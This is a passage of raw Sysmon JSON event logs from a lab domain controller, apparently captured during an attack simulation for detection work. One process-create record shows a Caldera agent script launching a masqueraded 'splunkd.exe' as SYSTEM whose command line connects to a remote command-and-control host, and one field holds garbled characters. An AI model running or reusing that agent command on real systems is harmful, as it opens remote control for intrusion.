05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:37.109\r\nProcessGuid: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nProcessId: 3048\r\nImage: C:\\Users\\Public\\splunkd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp \r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545\r\nParentProcessGuid: {A837DB8D-01B5-5F25-0000-001034380100}\r\nParentProcessId: 2096\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:37.109","ProcessGuid":"{A837DB8D-01BD-5F25-0000-00108F930200}","Image":"C:\\Users\\Public\\splunkd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Users\\Public\\splunkd.exe\" -socket 10.0.1.12:7010 -http http://10.0.1.12:8888 -contact tcp ","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=32E2535A13E90442893737530C4773D1,SHA256=C4A32E14644C0859C895A66C96AECC9647949F8295EADE40ACE7F3EFC597C6F9,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545","ParentProcessGuid":"{A837DB8D-01B5-5F25-0000-001034380100}","ParentProcessId":"2096","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\\caldera_manx_agent.ps1","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:37.156\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: 數䠀ऀЀƾ뉑ĭ퍑⸭\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nTargetProcessId: 3048\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+3c756c70(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+3c756c70(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:37.156","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"數䠀ऀЀƾ뉑ĭ퍑⸭","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-00108F930200}","TargetProcessId":"3048","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\windows.storage.dll+164bbf|C:\\Windows\\System32\\windows.storage.dll+164835|C:\\Windows\\System32\\windows.storage.dll+164326|C:\\Windows\\System32\\windows.storage.dll+165798|C:\\Windows\\System32\\windows.storage.dll+16414e|C:\\Windows\\System32\\windows.storage.dll+10cfd5|C:\\Windows\\System32\\windows.storage.dll+10d354|C:\\Windows\\System32\\windows.storage.dll+10c990|C:\\Windows\\System32\\shell32.dll+e8b0f|C:\\Windows\\System32\\shell32.dll+e899c|C:\\Windows\\System32\\shell32.dll+e86ec|C:\\Windows\\System32\\shell32.dll+31537|C:\\Windows\\System32\\shell32.dll+31495|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+33903a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+276811|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+acd808|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+271e5f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b56bc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+3c756c70(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+3c756c70(wow64)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:37.156\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nTargetProcessId: 3048\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:37.156","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-00108F930200}","TargetProcessId":"3048","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:37.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-0010D0930200}\r\nTargetProcessId: 3056\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:37.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-0010D0930200}","TargetProcessId":"3056","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:37.172\r\nSourceProcessGUID: {A837DB8D-01BD-5F25-0000-0010D0930200}\r\nSourceProcessId: 3056\r\nSourceThreadId: 2088\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01BD-5F25-0000-00108F930200}\r\nTargetProcessId: 3048\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:37.172","SourceProcessGUID":"{A837DB8D-01BD-5F25-0000-0010D0930200}","SourceProcessId":"3056","SourceThreadId":"2088","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01BD-5F25-0000-00108F930200}","TargetProcessId":"3048","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:38.235\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:38.235","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:38.235\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nSourceProcessId: 1224\r\nSourceThreadId: 2032\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:38.235","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","SourceProcessId":"1224","SourceThreadId":"2032","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:39.172","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:39.172\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 